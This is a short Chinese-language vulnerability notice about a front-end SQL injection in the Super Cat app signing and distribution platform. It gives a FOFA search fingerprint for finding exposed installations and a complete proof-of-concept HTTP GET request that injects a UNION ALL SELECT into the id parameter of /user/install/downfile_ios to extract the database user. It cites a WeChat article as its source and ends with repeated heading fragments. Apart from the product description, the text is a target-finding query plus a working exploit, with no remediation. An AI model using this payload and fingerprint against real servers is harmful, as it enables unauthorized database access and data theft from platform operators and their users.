超级猫签名APP分发平台前台存在SQL注入漏洞

超级猫超级签名分发平台是一个安卓苹果APP分发平台，能够对所有安卓苹果的APP进行签名分发，使所有自行开发的APP能够签名使用，包括登录注册等功能，还提供有SDK

fofa

"/themes/97013266/public/static/css/pc.css"

poc

GET /user/install/downfile_ios?id=') UNION ALL SELECT NULL,NULL,CONCAT(IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: 127.0.0.1:81
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

漏洞来源

https://mp.weixin.qq.com/s/xTcnm_fFubFCYw4LhIXwkQ

超级猫签名APP分发平台前台存在SQL注入漏洞

fofa​

poc​

漏洞来源​

fofa

poc

漏洞来源